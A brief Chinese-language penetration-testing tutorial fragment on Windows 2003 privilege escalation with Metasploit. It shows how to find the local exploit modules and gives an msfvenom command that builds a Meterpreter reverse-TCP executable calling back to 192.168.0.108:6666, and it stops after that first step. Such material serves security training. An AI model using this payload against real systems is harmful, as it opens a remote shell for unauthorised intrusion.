前言
常用的提权模块
metasploit 提权EXP存储文件夹路径
find / -name metasploit
一般都在
/usr/share/metasploit-framework/modules/exploits/windows/local
windows2003提权
环境:2003 server
1、生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=6666 -f exe > payload.exe
